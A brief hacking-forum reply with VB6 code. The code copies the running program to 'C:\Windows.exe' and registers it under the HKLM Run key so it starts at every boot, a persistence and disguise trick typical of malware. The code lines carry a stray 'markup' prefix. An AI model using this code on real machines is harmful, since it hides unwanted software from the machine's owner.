Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
VB6 + Registry
Not a VB6 coder at all, personally I hate the language, but this should do the trick.
markupReg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "C:\Windows.exe"
markupFileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows.exe"
that will copy the file to the C:\ windows location and will make a registry start up for it.